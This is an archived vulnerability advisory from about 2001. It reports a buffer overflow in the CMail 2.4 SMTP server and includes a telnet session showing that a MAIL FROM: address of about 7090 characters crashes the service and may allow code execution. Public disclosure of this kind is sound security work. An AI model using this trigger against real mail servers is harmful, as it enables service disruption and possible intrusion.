We found a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server, it is based on the eEye pointed out overflows in cmail 2.3 >:-] Which was never fixed... software vendors still not taking security issues seriously. Example: [cham@guilt cham]$ telnet example.com 25 Trying example.com... Connected to example.com. Escape character is '^]'. 220 SMTP services ready. Computalynx CMail Server Version: 2.4 helo ussr 250 Hello ussr [yourip], how are you today? MAIL FROM: cmail <[buffer]@cmaildotcom.com> Where [buffer] is aprox. 7090 characters. At his point the server overflows and crashes. Just a typical buffer overflow that should have been fixed in version 2.3 when it was pointed out to them. Luck Martins u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h WWW.USSRBACK.COM
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:09:10 PDT